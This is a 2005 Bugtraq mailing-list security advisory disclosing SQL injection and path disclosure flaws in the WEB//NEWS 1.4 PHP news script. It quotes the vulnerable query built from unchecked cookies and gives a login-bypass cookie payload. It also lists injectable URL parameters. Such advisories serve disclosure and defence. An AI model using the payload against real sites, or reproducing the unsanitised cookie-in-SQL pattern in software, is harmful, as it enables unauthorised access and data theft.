[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: [NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4 Vulnerabilities
From: r.verton () gmail ! com
Date: 2005-09-07 15:49:52
Message-ID: 20050907154952.31448.qmail () securityfocus ! com
[Download RAW message or body]
[NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4
=============================================================================
Software: WEB//NEWS 1.4
Type: SQL Injections, Path Disclosure
Risk: High
Date: Sep. 1 2005
Vendor: Stylemotion
Credit:
=======
Robin 'onkel_fisch' Verton
http://www.it-security23.net
Description:
============
WEB//News is a Newsscript which features like an CMS
Vulnerability:
==============
In the modules/startup.php
$_USER=$db->first("SELECT * FROM ".PRE."_user LEFT JOIN ".PRE."_group USING (groupid)
WHERE
( userid='".$_COOKIE['wn_userid']."' AND password='".$_COOKIE['wn_userpw']."' )
LIMIT 1");
As we can see, the $_COOKIE paramter is not checked. Below i've added how you have to set the Cookies
to take advantage of these vulnerability (send this to index.php):
wn_userid=1; wn_userpw=0' OR '1'='1
Path Disclosure:
No file in he /actions dir is testet if it is directly included.
Example:
/actions/cat.add.php?name=A
Nearly every REQUEST variable is not checked so there are a few of SQL-Injections availiable
A few Examples:
/include_this/news.php?cat=[SQL]
/include_this/news.php?id=[SQL]
/print.php?id=[SQL]
/include_this/news.php?stof=[SQL]
Greets:
==============
Whole NewAngel Team, CyberDead, Modhacker, deluxe
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic